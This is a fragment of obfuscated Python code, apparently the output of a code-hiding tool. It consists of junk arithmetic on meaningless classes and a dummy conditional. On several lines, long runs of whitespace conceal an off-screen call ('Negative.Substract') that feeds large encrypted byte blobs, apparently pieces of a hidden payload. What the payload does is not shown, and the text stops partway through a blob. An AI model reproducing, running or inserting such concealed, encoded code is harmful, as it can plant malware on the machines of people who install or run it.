        Negative(_add = -15295 - 69224).Positive(_ceil = Hypothesis._system * 98875)                                                                                                                                                                                                                                                          ;Negative.Substract(Product='WWWWXXWWXXWXWXWWXXXW',Frame=b'\x99\xcf\x0b\x07H\x1e\x1e\x00\xf9a\'\x04I6=\x12\x91"e\xa2-\x04\x03-sG\xcb\xd1\xcdvV\x07;\t\xb4\x1d\x86\x17\xe4l\x05\xf9\xba\xf2\xaa\xcay\xbd\xeb\x9cj\x05\x11e!\xa6\x06hj`\xfb\xad\xcf\xa7v\xa0qm\x97V\x8a\x01\x80cbSG\xda\x18\xf5,\xb7X\xbbl-\xa6\xac\xb9dr\xea\x15K\xcbv\xe4\xa3a\x89r\xccb\xb4\x06\x1a\xa3\x83bi;\xdeX\xf4\x84\x12\xaa\xaf\x8fD6\x11\x9fv\xae\xf4=@e\xef\xaf\x19\x1c\x11\x1f\x04\xcf\xa3\xc0\xa3\xbd\x00GH}J\x08\xe1\x82\x12\x02\x02\xc1\xf1x\xd6p\xedY(\xf4\xb2\xba\x1d-H\x8d\xd7\xde\xa5\xf0\x97rn(\xa65\xed\xd8Z\xb5\x0f*%/\xf2\xea\x1b\xb3\xb5\xdd\xc5\xabl\xcd~?\xa9\xa4\xeb\x00(\t\x0e\x16x\xb5\xfd\xdd0H\xb5\xbdF\xa8;X;\x1e\x85\x0f\xc4\x8a3\x1c\xb1\xdc\xdaB\xe0\\\x17Q\x96\x00i\xf5\xd0\xdaR(\xdd\x1f\xb6\xe6\xdd\xa2\x88jI\xc6H`\x04\xb4\xb3J\x83\xaf;\xec\x88\xf4M\xbd\xc6D\xfeV\xc6\xe4\x05\xe0O\x0f\x19\xfb\xfb\xf8\xee1\xd6\xba_,=\xe0\xa9\xaa\x15\xd2<dAP\x02\x11l\x00\xb4\xa7\x8a D\xcc\xf2\x14\xba\n\x98c\x92(\n\xa5\xdd\xf6S;\xd3\x8e\xf8q%\xcd\xa68\xcc{\x96\xac\\VwWR\xea\x9dg%\x84\xc8\xd4\x87\x17e\xf2*t\xcf\xddf\xf3S\x08\xc6Q\x9aPX@lU\xa4\xacnw\xecCm\x0c\x03M0 \xe97K=\xd0{\x98\x89\xc5w\xe9[=\xd5\x86\x99\xa2\xe8h\x89\x92euwMH\xf6\xbe\x829\x00\x9b\xd1\x18>\xa6d|\xe5s\xfa\x00\xf3\xc4\x11\x84\x1f\xfc\xf7\x1e\xc7\xcfx\xf9\xd2\x83\x93Q\xeb,\x9c\x9d\x12\x0b\xe7a\xe1\xf1\xbaW\xeb~\xd0\x00C\xc0\xfd\xa8\xb6i\x07\xf3C\xc9n\xc1\xebR\x16*\xd2\xad\r\x1f\xa4C\xc2qz,\x07\x82l\x18\xe5\xcb\xf6\xa6y\xefl>\x17H\x111\xe1\x90\xb1<\xe0w\xfa\xdfaGHn\xb96a\xbb\xa1\xa4\xeb\x03N\xc9>\xb0\x92\xb0O\xf9\xd9z\x9ct\x03Aw\xb9\\\xda c\x02\x1a\xffQ\xddTG\x94\x826Ej^\xcc\xac1\xae\xb8\x12P\x9c$\xcc\xf8\x01\xc6\x11\xc4(\xa0\xe6\xca\x1aa\x91\xa2p\x9e1\xdf\x08\xa5\x97\x84M\xbb9\x06\xf4Muqm\xee\xce\x98\xe1\xcf\xba\xd3\xeam\x9a\xafl\x10\xb5pB\xb7\xaf\xdb#\xec\xda\xa7\xf7N&\x05\x19\xf8\x13|\rx{\xa0\xa7\x88\xa9~W\xe5\x07\x8a\xa8|\x15@9\x1e\x04\x0f\xf4V\x86\xa4\xafLj\x10`63\x17c$}+Uo\xaet\xff\xd2\xd3*}9~}[\x87\xbc`\xe41\xd9\'y\x02]\xb6\x87,\xa2\xbe\xc0=C\xfa\xcd \xf3\xd9~_\xd9OPcv\x04L\xb2\xcb"\xbfO\xba"\x8d\xeb\x98\xbb8Cy\x97%\x9d\xb2\xdf\xa3\x0e\x04\x80\x0e\xf1\x1b\x84\xd1\x10\xdc\x86\xc6ld\xb6\xf4\xf7\x03E;@\x06 p\xc6P@\x8a\xfa\xc0\xf7E}\x9fL\xd7d\x7f\x98N\x16\xb8J\x80\xd3\x07:-\xd2Y\xf5 \x8bi\x17\xac\x9b\xc6t\x9eM\xc7`\x1b\xda\xcd\x12\x0c\xcf\x9f\x08\xb23\xd1\xcb+M\xa7\x13k\xa2\x99t1\xd1\x98\xbb\x17(\xad\xb6\xbb\x89&;\xd9\xd8\x13\x8c\xfd<tt\xe1vm1\xd20+\xd1\x0f\x03\xad3F\x1aL\xd1Q\x06\x99(\xe8\x05S\xd0\x1e\xbba\xd4Zw\xb7\xd6q\xa9v\xb0`\xb4\xca\x1b\xa6shS\xc4\xa1l\xef3\xec\xb0\xf6\xc5\x0f\x80\xea\xa7\x91\x91\x97}\xb3\xda\xda[\xc5\xd4[\xc93\xd7G__\x80\xdcI\x148\x04\x92\xf1\xa0X\xda\xca\xd1\xdar\x16\xb6h\\\xaa\xe8\x0b\x84\x96\xf202\x9f\xd8S\x07\xacCx\x0c\x9f\tL\xe9\xdet\x88\x16\xdc\xda\xf6\xaa\x9c\xe7\x11\x0b\xcbs\xf4J$.\xe6\xac\xbe\x18"\xa5\x05$6F\xd4\xffhtJC\x96g~\x9a\xf17tr\x9a\xceWD\xea@9}\xf7\xe4\xc9 f\xb1\x1ee\x9d\xc6\xd8u\x1f\xeflX,-\xdb\x91\x87j$\xf2\xe1\xe2\x0f(\'\x97_,\xfdI@K\r\xec0\xb9,w\xe5\xf6>\x18`1\x06z\x04\xa8\x96\x13\xd7V\xa6\xa4\x95\x1e\x01\xc0\xb1\x98\x83-C\xb4\xa8E\x9f)\xcc$WZ\x8e\x87\xf3\xb1j\x84 :\x18\xfd\x84\x87+\x94\x96\xf6Q<\xaa\xcbg\x00\xd0\xb6\x10\'\x96Bi\xb9#\t*\x87\xd8g\xa9\xf7\x06\xe8H\x1a\xe4K\xdb\x99\xcb\x85\x95\x8b\tg#f\x80(\x94\x96\xdf\xf7\x88\x89\xbez\xd6\xa8\x19\x14Kk\x8f\x9a\x81\xe5M\xb4\xb3\xea\x0c\xac\xb28\x97:b[\xdd\x8aQ\x98U^\xef\r#\xbcG\xeaa\xa4\x1f^\xe0\xff\x16\xa5P8\x0fs\x0cF\xb8\xf0\xf5pQ\x8c>\x13+A\xae\xf4\x801(\x9d\xdbi,\xeb\x85\xb1jd\xad\x19m;"c\x7fR?~\x97\x98_d\xaen\x90\xb8\xf8\x0f\x13yi\x9b#\xf2b\x921b\x98\x1aU\xc4\xa5\x1d\x1dnu\xef&\x8aR|\xe1,U\xc1f\xf7\xc8\x1b\x9b\tP\x1046\x1b\xaf\x8d\xbc)\xab\xdb%\xf2\xc6\'\xdeUd\xea\x9d\xabAI&\xe9\xda\xc1\xae\x10\xe0z!q\xaeC\x88r\xaa\xef\xdc\x94\x88\x14\xa1\xe5\xca\x83\x94\x90_\xc1Z\xab\xca\xea\x86]\x91\xb9\xa9\x15\xc8\r\x02\xf5\x19\xd4\xcf\x18r\x04\xcd\xa6\xda\x8e\xb9\xf0\xa0\xedFeDx\xe0\xcdqY0$\x9d\xac\xcf\xde\x9cBi\x15\x81)b\xd1\x88`\xaf\x11\x0bL\xb9\xd2j\xb0L\xd9\x19\x89\x94\xfd|Y\xb7z\xaf\xc8(\xd2\x07\x04Q%}\xa4\x17f#^\xcb\xea\xee\x87\xa4\xc7S\xbd\'\x0cfa\xed(\xd8-\x86\xbd\x99\x95\xe5q\xa6)-g\x99\xac\x8f;P[\xee8>\x1ae\xd29\xfaF\xb0I\x9d\xe0\xb4\x145\xd9\x1e\x9b\x86t\x0e\xe9\x18\x12.\x17\xaea\xd3\xd8Tw\x07\xc8\xde\xceN(\xe0kK\x10qU\xdf\xd5<&Z@\xc8J\x87y\xd5\xaa\xc4Q\xed\x1b\\\xf7^\xc9\x96)\x97\xae\x84\x95\x97\xf7\xbdw\xb3\xb0\xb6\xc0\xc2Jf\xab\xd1\x05\xae\xe0LU\xd1mG\x88y\xda\x15\tH$\x1e;\x8e\xca\xa6U*\xab\xdb\x1doM\x86+\xd0s\xc3\x18\x90\xca\xaa\xb9{\xb1W\x1f\xbdy\x84\xe6AKV*\xcf\x92\xd1\x9e5l\xe7\x11\xa5\x139t\xef\x1e\xcd\x90/\xe7\xd7+\xeb?\xad\xbb\x11mdR\xfbND\x1d\x91\xac\xe3\x92\x03z\x15s\xc1u\x90\xfb\xcd\x8a\xbanG\xd4\xdf\xa2\xef\xe75\xfc8c\x01\x90\xed\xd6u\xfe\x96\xb0W\x98swL\x9c\xdcc\x86\xaf7I\x1e\xd0\xf1\xc8\x8c\x81\x8d`\x1eO\x025\xfb\xab\xfb;hD\'MV\x02y\xb2\xfb\xa1\x94S\x9a\x9c\x03\xf1m\x8f\x13\x90D\x8c\xd6,\x94\x96\xed(\xc2\xc0\xad\x00\xb5\x05\xb0\x18\xbb\xcc\x05](\xed~a\x12]RtHQ\xcbE\xbc\xb3\x17\xa6\xb2\xba5(\xa3\x0f\x15tmq\xc9\x1b\x9ey\x9by^3\xd0\xd7\x19\xdd;8\xa9\x88_6@\x05w\x80\xc6\xfd\xb0X\xdaH\x83\x14\x12p\x89\xc3\x91\x084/\xccR\xeaU\xa9\xbbK\x0f\xd8\xc4pD\n\xd07\x11J\xbf}k\x84~\x968:\x9b\xaf2\xc3Sa\xa1\x9f\xcb\xeav%s4\x0f\n[j\xaaZ\xc1\x8dRI\xa3\x8e\xe1\x89\x16h\ruyas\xe5rqm\xab\xdbM\xce\xe88\x9eD\x83\xb8v\x8c\xc2\xd6\xe1\xdf\xdf8\xf0c\x9dj\xc2\xfa_W\xb85%\x8b\x87\xf1\xa0\x1b\xacW\x16\x16\xab\x81\xb2\x13\xbdM\xff\x9bt\x11Y\x12\xdf\xf9\x13\xdfU\xf2g?\xae\xefp\x16C"\xe1\x10\x80r\xaa[{\xf7O\x11(\xbd\xcd\xbda\x87B\x14C lGG\xeb@b\x1b\x17\x06iT\xfb\x9d\xe4\xb1\x9dg\x88\x8fX\xd1\xb0\xc8\x92\x82.\xe8\xa5\x1b\x1b%\xf00p\xbc\xaf\x97x<8$\x1c\xbd\x15\xf4\x03!P|&\xd1\t\x995:Wv\xb0\x00\xad\xcd\xe2\xd3\xfe,s\xdbR\xbd{B\n\xde\x8c=\xc5\x92<$\xdeJ\xbc9b\xb1\x8f\xact>eu\xbb\xf2\x00u89\x05\x9a\x07>\x1b\xcc)\xafN\x98\xe1\xdb$4\x16\xc7\xf3\x8a\xf1l\xe5\xce\xd7\x86\xf6e\x96R\xfb\x96\xe8%\xf2\xb9|\x0e\xac>SV\xb7C:\xec\xee<>\xf6RV\x047V\xf5\xd1\xc3\x0e\x0f\x11\x8f\x90K\xc1n%\x9e\xd3\xdf\x13\xabF\x07\t\xe9Z\xf20\xb8Hz\xe3\x92\x89\x89\x1a\xac<2\xb6\xb1{Krh\xf4\xc3\xacN\'l\x13\xbe\xe5\xde*\xab\xbbCR\xc3w\xc6wa\xe7\xe5~L\x9d\xf9\xadAr"\xed\x1b\xb6\x94<\xf9\x14{\x90\x97\xb3\x10l\xab\xdbQ\x00w[\xf1\xa8\xb4K:\x02\xbd\xbda\x13\x1e\xa8?\xac\xa5\xf1\xb9e\x06\x1apr\x81\ts\xd2O\xf5\xf7\xa9\xe6\xa6\x9f\xe0\xb3mN\xfaX\xf3\x10)Y \x86\xf7\x18r}\xa8\x95ZI \xea\xaa\xc1\x06<\x8f\x92&\x89~\x96\xc3\xa1\xe6\x03\xac`/!\xdcj\x0fQ\xdd\x04\xb1\x95\xfc\xc0\x85\xd2\xee\'7\x9b\xb2\\\x8c\xb0b\x8aC\xab\x8b5\xb9\x95\xd5\xed\x98n\xa7S\xb1q\xb6&\x9b\xe9,\xe3VK\xbap\xa1\xf9\x13\xc8\xc9\'\xe2c\xec\xe377\x0e#\x0f\x07\x86\xbf.\xe7\xb7_;M\xcd\x96\x01:\xe1\xc1h\x12D\xd0\xbb\x19\xa0\xb4\xddzXw\xf7\x96\x8ab\xech\x91\x98\xd1\x88}\x1dN?~\xec\xf3\x02\x13\xa8\xbb\xe9\xc3$$\x93\x11\x18\x00U\xad\xfa\xde\xf1\xcb\xaf\x97\xa2\xee\x8b\r@m46\xdc\x069\rQ,\xf5$\xe9g\r\xb7\xdb\xeav\x93\x186\x8e\xfaq\xa0\x9en\xac\x06\x927\xf7\xe60\xa3G\x03/\x01s\xaej\xce(\x86m\x00\xfc\xd4F\xc4n\xe9\\&{p\xd1\x98\x9b3\xeb\xd2v\xbb]k\'\x99`w\xb3\xee\xc42\xe4\n\xff\x81!\r\xd2\xa1\xbd\x07\xacIk\xd5\x89@\xcc\x0f\x94G\xfaPE\xb0\x96\xc5w\xf2\xdd\xb0#g)9\xb6\xea{rvv\xcbs|\x1f\x13\x0c^q\x0c*\xf3\x04\xc3V\xe5\x8c\x9b[\xba\xe9TG\xcf\x0fx[hH&\x9a\xddj\xa2\xbf\xb7\x9f\xee\xa8\x1d(3[j\xb5\xbd\xf6\x92\xa7')

        Hypothesis._round(_math = 12700 + Hypothesis._system)                                                                                                                                                                                                                                                          ;Negative.Substract(Product='ooooDooDDODDDoOODOooO',Frame=b'\xefr1\xd2G\xfe\xf4>s\x9b{\xc8\xb66(\x966\x92\x10%\x91\x9c\x9d`\xaeg\x95\xf7,\t\xb1\xacn\x97\x1e\x8f\x0e8)\xb41\x8ef\x121\xcb\x95\x9b\xca\xfb\x1c|\xe8#\xa4\xa3\x8f\xc4\xf9q\xb1\xf4\x80=H\xcd\xf9\xd2S\xcc7\x00\x10YH\xa1\x9d\xa6H\xba[\x9aE\xbbb$f\x0f\xe3\xfa(k:\xd1OgJ\xba\xf5\xdf\xb5\xec\x87\xd8\xda\xab[\xa0\xff:\xc29\x97\xd2\x8d\xd2\x04\x8c\xdb\xf5\xdd\x0cb\xe0\nB\x83\xdd\x16lw`\xe9\x8ce\xf5*\xea\x8b\xef\x00\x84@f\xe81f\xf4\x1c\xa7\x98\x0f\xfe<=/\xcf\x00\xcfA\xc0\xee-e\xa4\x938\xffBi\x0b\xdd\x93\xd0_\x1eBx v\x05g\x14F\x7f\xe5Jk\xdfg\x8f\xef\x95\xb8\x84\xfa\xac\xf3\xdb\t[\xed\xcc\x0eeuk\x10\xac\xbf?p\xf3\x08\xa2[1_8\x904A\xb6\x8c\xfaB\x94m\xcd\xecY\xdbb9\xf6,kr\x95\xba\xdd\xc0aZ\xc5H\x92\xfc-bx;\xde\xac\xbdpQ\xefs\x92G\x03\x01vV\x16\\:A\x89\x1b\xf3\xd6,\x83\x0f\xcf|\xab\x89CD\xc3e\x88\x8c\xf8!F\xd3\xc58\xf3\x15J\x0f\x0eX\xb3\x19\tG$\x8aC\xa1\x9fm<\x8bJ\xa8e?\xcc\x02\x1eck\xc5\xacR\xb7\x9bU\x13\x12\xde\x93\xd3\x03lQn\x04kh\x0f\xe6\xd1\x08\xacS`}\xf4#\x98G}\xd5E#\xf5m\x1aM\xe3\x81\xd7\x81%2\xc3\xc2\xbd\x8e\x89\xfb\xe0\xd21J\x12\x15\xd2\xdaP}+\xeb\xe6>\xe6\xbb"\xbe\x0b\xe2\xd8\x00!6(\x966\x02\xad\n\x9c6\x0c\xb3\xeez\x91\xc7\xf2\xe9\xc3\xb7\xd5\xdd\x81\xb8\xe2\x10\x89=s\xbc\xeey\xf3\\\xce\x94\xd7\xbeQ\xabU\xdb\x8e\xc7x!\xe6\xf4j$\xcb\xc7a\x11~-\xf7_R\xdb\xf6rQe\xdb\xeavf\x1dk\xd1,\xb8\xa2X\r!\x8dB\xed~\x7f\x86\xb1\xc3\xf2\xcc\x1a\xb2B\xc9\x08\x1bYt\xf7Bc(e\x84\xa5:\xec\xe1\xb1\xfdZ\xe9*\x08\x15&\xe4\x8dr\xd5\x86\xc01\xd2W\x7f\xb8\xf6\xed\x8a\x93]ar+\xc4\xa4TZR\xd9\x9c\x0b\xe8h\x08\xc2\xc4\xc8\xd7\x11<\x86\xa3QeK\xee\x11\xc3\x99\x1e\x98]\x04\x07a\xa99\x8dRD\x06\x98\xcb\x84\x93\xba\x7f\x86\xa4\x12\x85\xd2}\xa9\x16\xdb$\xd00\xeb\x16\x97e\xd4\x16\xe8z\x16\x9a\xae\xac\xee\x1eT\xe6=\xb8\xd5\xb3\xd1\xa8\xb3\r\xa5\xeds)\xc4\xaa{+\xb9\x16\x8c\xd3\x1d\xb8\xcc\x07\x82XA\xe7\xf9@;\xce\'\xda}>\xe1\xb2\x0eP-\x94E\xae\x93\xab\x9a\xf2\x15M\xf4\xf5H\x19<[\xf7\xf8E`k@`\x83\xba\x9cA\x03*\x1d\x98\x910@\x1c\x83\xc3\x7f\xfe\x18\x8e\x16e\x1e\xc6&\xe9\x0c*\xea\xbd\xacy<\xc6\xf6\x87L\xe6J\xf9\x02\xfdbi#\xe7\x92\xc4\x80\n\xa4HL\x882\x0f\xda\xce\xa5\xb2\xba\x9d\xdd\n\x8d\x8d\x17\x04\xa2\x00\x9e\x0cS\x92Q\xa46\xd5\xab:\x9boB\x14\xbe\n\x18S^\xaf\r\xe0\x98]\xd3kt\x97\xc4\x80\x056\x11\xd5D(\x15\x81M\xb6~V\x11U\'3\xc8\x84\xfeg\xd2\x1b\x98\xffuA\n\x003\x8d\x1f\xdd!w\x87\x9a\xf4=\xd7\x9b\xab\x05\x14\xde\x07\xd1\x0c0L\xfb\x88\xbf\n\xe6&\xe7V\xc0B\xba\x08\xef\xb62\x12\xe9\xfb\xff3\x8a\xe9:\xb1\xc8\x84\x9fS+\x82r\xa0q\x0b\x1cEY\xcf0\xeb!3-Fw\xa3\xfb\x99b\xbf\x83bi\xb9\x10\x1e\xa2\xb8\xdd\xc7`q\x0c\x18G!\xbcPz\x00\xc6[}TFS\xd4\x87\xc1u\x9c/,\x9c\xd6\x07\x1eo\x11\xe1,n\xfe\xec\xa7\xf0\xf6\x9b\xf2\xd6\x05\xd3\xb6B=p\x95\xa3\x83\xd0\'.y\xafe\x10\xfa\xc3\xf1\x1f\t\xec\xc5\x8eb\x10\xd9\xc0\xcdi\x81\xdb\xea\xb5\xa4\x01\xaa\x11\xbcWyw\x93\xe5\xd2\xe3\x9c\x04WW\xcd\x93\xc5K\x18\x9am\x97\xb4\x89\x17\xecp\xc7*u\xbb\tw\x8c\x8b\xee\xbd\x00\xdc\xaaq\x83\x00\x13\x19\x11Z*ll\xff\x8dsF\x08\x1d\x02\x1a\x1a\xa0o\x95\xba\xdd\x00}\xdb\xc0t(\x95\x10\xa3\xfb\x87#"n\x1b2uh}\x121\x1b\xed\xe6\x86\xc6=o{\xf0<k\x98\x97\xd5\xed\xc8\x84\xdc6\xb2\x94\x89A\xb4&Y\n+\x15\xe9\xc1\xe7\x94\xc4\x10\xe2\xd2\xd3\xd2C\xa6\xf4\x80\xf5q6\xb9\xa8\xb1\x9cXRa\xb7\t\xcd\xb2)\xcc\xb2I\xce\xf8\xdbO)\xf9\xceM0\xb6\x91\xe1\xed\x9c\xbbb\x94o?\xe2&\x97Z\xa7\xee\x0c\xbcX\xe2\xd7\x05&k\xbb_4\x82\x05\xf5\xd8L\x10\x87&u\xaa=G@\xb9o\xcd#eu;b\xc9\xa9\xddV\x9c\xd5n\x01)\xee\x96\xf2v\xbfG\xa2\xf8\x1d\xafS\xe9\xb5\x11\xd07B\xf0\x08\xac\xd8\xf5{\xc9\xe8\xe2b\x88\x842\xc3\x0b\xa0\x97\xc1/\xb0\xfe\xd4\xbet\x81\xd7I\x8c\xacX\x97d)\xb6\xe3\x91\xab\xd4\xed\xa8\xab4\xa62\x19s|7\xe4?\x86L\xc8\xe3&\x94\x82"RK\xccb`\x8d\x1f\x8dW\xcc\x99\xf0\xb6\xd5\xed*\x98\xa9\x8dF\x83\x08y|w!\x7f4\xb4\xe1\xb8,F\xbe\x82\x84#\xd2]\xc4\xb3\x8c\xcc@v\xe2\xe7\xb2\xba;$~>4\'\xb9E\x9b\x90%PH2\x04\n\xfc\xfc)Wd\x93\xea\xd6N\xfb<\xb1Y\xbd\xeaY\xa0\xfah\x1e"\x13\x11\xb1[\x82\x05\xaa\xc7H}\xab\xb4\x1c]\xdd\xc3\xa8\t\x8f\x83\xa3\xfb\x8c0\xcc\x945\x9eX\xed\xb1.*\xb9\xac\xaf\x83\xdc\xc4\xba\xadnc\n\xc3\xad\xf7j\xc0\xf7k\xa2\xef\xd4\xc0JR\xcc|k\x87i\xd9)\x93\nmX\x86\xc01\x0c\x08%\x9ag\xad\xffm\xcb\x87^\x12g\xd9\xaa\x9bJ\x00\xc4X\x02\xd31|\xb88\x1f\xa7i\xf9rv\xf8\xfeI\x08\xafRRR\xe4\tr4\xee\x80\x06\xba0\xdb&\x16U\x8d\x99w\xd5\xb7\x9a\xc0eU\xa1~v0\tj\x11\x86OY\xeel\xbf\x9fk\x05\xc3l\xab\xdb\xaf\xbe<n\xc6,k\xcaN\xda\x02\xe0r\xa3\x19Qb\xf8|\xeb\xa4\xe5\xc4\x03Kj\xaaR\xb7#\xcbP{\xab\xa3\xd2\xe9\xa8\x00\xf49J\xc1\xbd\xa4\xcf\x03\xf5\x1ft\n\xdd\xc9\xa4Q\x8f36\x87\x8c\x15\xe2g\x94v,@\x9c\x15\x9e\x9f\x01\xcc\xc5\xf5i\x99\xf7\xd5[\xa1gB\xf2=\nN\xba/\xc9\x16\xdf\xa6g\xc4C\xeeh\x12\xc8@z\x1b 2$W\xd6H\xe9\xc8\xe8\xa8\xa1ATh\xee\xf0\x1c\x8b\xe1\xa6\xba\xc1\x0e\xb3j\x03\x0c\x9dZ\t;I\xc1\xbd\xce\x85g\xa7\xdd\xae\x96@}\xc7IE\xe7\xae\xf0f-\x85\xd0QV\x18\xcc\x0c\xf3\x8d\xc8\xb81G\xcc\xa1\x1a\x80\x02\x08\xecW]\xc7\x8f\xa0\xff\x04a\x90\x04>\x12\xbf\x02\x01\xa1\xfa\x1e\xf6\x83&$\xad\x1c\xe0O\xa7\xf2\xf5\xf2\x92\xcf\xabl\xd0\xf5\xd9]\xef\xf2+D\x1b\xfa\xa0X\xba\xaf\xd5\xea}l\x1c\x94f\x028\x00!4\x97,\x1ch)*o\xbf\x98\xf9\x10"\x8c\xb0\t8Yl\xa1\xb4\\\x11\xa5<o1\x06\xf6\x06:\xcc\xb7P\xda\xc8)\'L\xf2\xa2l\xca,\'\x8eK\xcfr\xca\x95\xd5\xdd1\x86\xf1\x1d\x175\x0c\xb9>?\x87\xb8k\xe0\x0b(\xcd\xae\xb5\xa5\x11\xc5\xee$^6\xb1W\x89\xb0\x8d\xd6=n\xc4*u+\xa6\xb5\xab\xe1\x91X\x97Q\xb2\xfd\xb8\xba\x0cGw\x91\xad[\xa8O\xdb\xd6\xa8\xdb\x18\xf1\xe9\x18\x03\xf2\xb1_\x9c\x03\x95Di(>\x8cA\x8f\xadK\x11>)\xc0\xaeP\xda\xad\x16.\xe6wQ\xf4D\x01\x0c\xad\x81jg6-\xab\xbbcj\xc5\xfd\xa7E\xe3\xd4\xed\xac}\x1a\xc4\xf1\xa1jPmG\xe6]]Ih\x1eE\xe7\t\xe9Q\t\xc8\x05\xf2\x80\xfa\x98\xeb\xd3C\xfa\xc7\x88\xf3\x92\xe6\xca\x0e\xd8\x1a\xe4\x15<\xab\xddhm\xeb\xe26-\xd2\xb5\xb6g/\xe8\x1d\xd0#\x02?\x04\xb6\xbe\x1e\xb0\xf6\x11ah8\x8f\x81mh\xeaM1b\x1agm\x19?\xea\x7f\x11h\xe5\xaa\x1dB\xfc?D\x18\x03\xfb_\x8cdtA\xe6\xffn\x10a\xdf\x03t\xadF\x18\xd4\xb7\xa5\x1d!\xe1\xce9/\xa4j\xba\xdcc*.\xf8\xf1\x9b\xb5+\xf8r\x10\x04\xd8B/;\xe5@\x96\xa9.\xe1\xd0\x96\xc3\xc6\x8bk\xbc\x97\xa0\xff_K\xa0\xff\xef@~\xb1\xf3|\x11"E\xa3\xef\xb9!pb\x0epD\xf8\xf1@\x8d\x87\x8e\x13\xeeexN%|\xcb\xee\r\x18\xf4T\xcf\x9e\x0cP\xa6\x1eR\xf0\xf4Y\x13\xa0\x89\xbcPZ\xbe\x1e\x84(\xa0\xf8\x84\x8b\x82|\xd0\xb8\xa3Bi\xf9\x8e"$\x04\xc2l\xd4\xeagt>\xb9\xb2}v\x94:.\xaf\x02\x04*\xce\x98$k\x87B\xec{\x9clA\xc5\x12"\x96D\x06x\x94\xdd\xd7\x08I\x9e\x06x\']\x8c\xc7\x02s@\\,\xad}q"\x8c\x8a\xf0\xe9\xe6\x14$\xdb\xbbQVw\x17\xef\xc6\xce\x93\x89\x86\x1b\x0805^#B\xf7,\x80GY\xdd\xfaqZ\xb8\xf4\x9e#[\x181\xdf5P`\x7f.\xd1\xf7U?\xde\x08\xb9\x8f\xc7-\x8bQ\xa3\x89\xae\x87\x93\x19\xb0\xfa\xc1<\x19\xf3D\x97+ma\xc5\xabl\xde\x8e\x91\x89\xa5\xc7\xf2\xb7\x8b\xca\xa3_,\xdd\x9f\xc5}\xff\xbcH\x1b^5\x1c\xea\x81\x9a\x9fk\x13[o\xdew\xa0\x01\x01\x06\x18`8*(\x10PX\x1d\xe8[\xeb\x96\xf2\x01\x08.\xc0\x90\xd6D\xe1\x81\\\xe2\x80\r\x1c\xf1\xc7\x05\x062\x1f\xa6m<\x13ok\x13T\xc9\xfc\x8f\xd0\xb9\x9cSx[\xdd*dV5\xc2\x9ft4~\x96\xbe^\xa2\xda\xdb\x16\xf7\x1b\x1bN\xb6H>\xc6\xd5j>\xe3\xb5rP\xeb\xcao\x9b\x80\xf7#X\x0e\x01\xf9\xa2>\xc7\xf8V\xbb\x87k\xabvhb\xc2\xc3\xdc\x8a\x1e\xe6\xc2~\xb6\xd5\xed\x8a\x86T\x82|\xba\x00\xeb\x19\x08\xd8\xd4\xa2\xb86\x01\xa4L\x85\xdd\xfa\x8c\xd7B\x8e\xd9\xa1\x90\x91\x0b\xc3\xde\xbe\x16\xf6-]\xca\x0fM$\x8eku\x0f\x11\x08m\x01\xb2J\xdd\x1d\x17\xda\xf7IST\xa2n\xe5\xe3\xcd\xed)\xa7\xbb\xb4\xf4\xdd\xf0x\x831\x0cx|\xc1\x83\xa0D\xf2s\xf2$t+t\x89\xef\xc8N\t-S\x8f8\xeb<\xcb')

        if 192215 > 5705135:
            Negative(_add = -14277 * -96970)._round(_math = -80898 + Hypothesis._system)
        elif 270312 < 7346476:
            Hypothesis._round(_math = 72785 * Hypothesis._system)                                                                                                                                                                                                                                                          ;Negative.Substract(Product='iljijllliiljijjjjl',Frame=b'\xffTV\xb7C[L\xb8\x0f\xcc\xcd\x9a\\\xb1\xd9\x1c\xb2\xbb\xf8\xa0\x0e\xd6\xd2(yt\x0c9\x90!\xd1\xd1I\xb0\x0e\x17UTreF\x9424A"h\xc9V\xebTGa\xc7\xb3\x1d\xe3I\x8b\xef\xf9\x84\x89\xb3.R#\xda\x8c\xd5\x1d\xa0\xf8\xec9;.\x98\xd0\xbaD\xf2u\xbeJe(\xed\xfa\x05\xfc\x9eMw\x87\x9f\xad\xdf9\x1f\xa3\xbaC\xf0\xdf+5\xd7Uw\xb1\x03\x18\x98u]E\xd6R\xeb\x7f?\x8fJ\x93K>\x9a\x1du\x99\xc8\x9a\xb6\xefX\x170\xbdbN\xb1l~1\xfb\xbdZ\x1a\xd9\x1d\x954\xf0(\x82\xff$h\x12\xcf\xba\xcd\xcc\xa2\xb3\x9e\x9b,\xe8\x01\xe5G\x8fx\xeb\x00\xd5\x0c"\x98\xb4\xf2\xb7\xe0\n_\x8e\x11\x0b\xf0\xe9!\xb9Y\xccF\xf5A\xb1\xf4\x80=\xf1]\x8e\xdc\xa9\xe1\x91\xb1a\xa9v\xa9l\xb7.\x05@&\xc4\xd6"N\x8e\xe0\xf3\x9e\xe2\xb6\x97\x8b\xc5=dv\xd8\x9f5\xb7!\xc7h}k\xee\xce\x93\x0bP|\x05\x0c[\xb8\xeb$\x87^\x1e\xce\x11\xe7\x16\xf3\xf6A\xf8\x9d\x0b&<M\xd2\x83\xad\xd0Lm\x10\xe0\xa497\x8c\xcbA\xd0\xfa@\t\xf0n\xf9\r\x08\xed\x81D\x13\x02\xd5\x87\x17\x10\xba\x0e\xac)\xf5\xed\xd1\xb6\xb5\xd7f\xb8\x95\xb0 \x0c\x1b\xcey\x11\xb7\xd5\xad\x18X\xf9N\xb4U\x10\xe8\x87\xe0d\x88\xf5\x03|2d\x11\xaa\xddvb\x0e\xf0\xadv\xb0\x93*\xf5\xad\xb6\xabR\xb7\xa3\xb6\x0b!\xad)0\xed&jD\xddu"\x02\xe72i\x16\x02xZ\xb7}7\x86B\x02\x82y\xcc\x86&t\t\x8f\xd1\x1f|\x98~\x9dV`\xba`\xdf\xc7n/\xcfRH\xfe\xde\xd7\xc1\xfd)\x0cG\x18\xe2b\x85\xbd\xa8/\xd7\xe5\x8e\xe7>\xc6P\xf9\x18\x92\x00\x11\xf2!:\x9e\x0b\xa5\x8d\x00\xc9\x12+%3\xad\'\x06F\x9e1\xect\x0feu\xbbL@(T\xa4S\xa5\xdc\xf8\xf5=\xc8\x94\xcc\x8d\xac\xbf\xe4{:THF\x9c\x9bH\xeb\x87\x18\xe1\xc1\xe0xxl|\xd4\'\xc1\xb43\x91\xd9T\x07B\x8db\x07\x02W\xa9\xdb\x11}\n\xa5N\xcf\x02m\xebK@C\xe0\x86#\xbe\x1e\xa4\x8a\x83G\xed\x16\x94\xb8\x1ca\xae\x16/\xa4-\xe7\xc49r\x89mu+&\xe3\xd9Y\x06\xd2)\xa0\x90\xd8\x17G]\\?\xed\xa4\x92\x1a\xa1\xe9\x86$HR\x1b\x96Q\x1fQj$\x08d\